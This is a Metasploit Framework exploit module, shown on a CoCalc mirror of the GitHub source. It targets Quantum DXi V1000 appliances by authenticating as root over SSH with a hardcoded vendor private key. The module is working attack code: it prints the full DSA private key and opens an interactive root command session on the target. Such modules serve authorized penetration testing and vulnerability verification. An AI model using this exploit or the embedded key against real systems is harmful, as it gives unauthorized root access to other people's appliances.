Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
28008 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'net/ssh'

7
require 'net/ssh/command_stream'

8


9
class MetasploitModule < Msf::Exploit::Remote

10
  Rank = ExcellentRanking

11


12
  include Msf::Exploit::Remote::SSH

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        {

19
          'Name' => 'Quantum DXi V1000 SSH Private Key Exposure',

20
          'Description' => %q{

21
            Quantum ships a public/private key pair on DXi V1000 2.2.1 appliances that

22
            allows passwordless authentication to any other DXi box. Since the key is

23
            easily retrievable, an attacker can use it to gain unauthorized remote

24
            access as root.

25
          },

26
          'Platform' => 'unix',

27
          'Arch' => ARCH_CMD,

28
          'Privileged' => true,

29
          'Targets' => [ [ 'Universal', {} ] ],

30
          'Payload' => {

31
            'Compat' => {

32
              'PayloadType' => 'cmd_interact',

33
              'ConnectionType' => 'find'

34
            }

35
          },

36
          'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module

37
          'License' => MSF_LICENSE,

38
          'References' => [

39
            ['PACKETSTORM', '125755'],

40
            ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]

41
          ],

42
          'DisclosureDate' => '2014-03-17',

43
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

44
          'DefaultTarget' => 0,

45
          'Notes' => {

46
            'Stability' => [CRASH_SAFE],

47
            'Reliability' => [REPEATABLE_SESSION],

48
            'SideEffects' => []

49
          }

50
        }

51
      )

52
    )

53


54
    register_options(

55
      [

56
        # Since we don't include Tcp, we have to register this manually

57
        Opt::RHOST(),

58
        Opt::RPORT(22)

59
      ], self.class

60
    )

61


62
    register_advanced_options(

63
      [

64
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),

65
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])

66
      ]

67
    )

68
  end

69


70
  # helper methods that normally come from Tcp

71
  def rhost

72
    datastore['RHOST']

73
  end

74


75
  def rport

76
    datastore['RPORT']

77
  end

78


79
  def do_login(user)

80
    opt_hash = ssh_client_defaults.merge({

81
      auth_methods: ['publickey'],

82
      port: rport,

83
      key_data: [ key_data ]

84
    })

85


86
    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']

87
    begin

88
      ssh_socket = nil

89
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do

90
        ssh_socket = Net::SSH.start(rhost, user, opt_hash)

91
      end

92
    rescue Rex::ConnectionError

93
      return nil

94
    rescue Net::SSH::Disconnect, ::EOFError

95
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

96
      return nil

97
    rescue ::Timeout::Error

98
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"

99
      return nil

100
    rescue Net::SSH::AuthenticationFailed

101
      print_error "#{rhost}:#{rport} SSH - Failed authentication"

102
      return nil

103
    rescue Net::SSH::Exception => e

104
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"

105
      return nil

106
    end

107


108
    if ssh_socket

109


110
      # Create a new session from the socket, then dump it.

111
      conn = Net::SSH::CommandStream.new(ssh_socket, logger: self)

112
      ssh_socket = nil

113


114
      return conn

115
    else

116
      return nil

117
    end

118
  end

119


120
  def exploit

121
    conn = do_login('root')

122
    if conn

123
      print_good "#{rhost}:#{rport} - Successful login"

124
      handler(conn.lsock)

125
    end

126
  end

127


128
  def key_data

129
    <<~EOF

130
      -----BEGIN DSA PRIVATE KEY-----

131
      MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2

132
      hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t

133
      Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2

134
      +o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4

135
      6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5

136
      PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr

137
      E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK

138
      6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn

139
      k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u

140
      B3Upsx556K/iZPPnJZE=

141
      -----END DSA PRIVATE KEY-----

142
    EOF

143
  end

144
end

145


146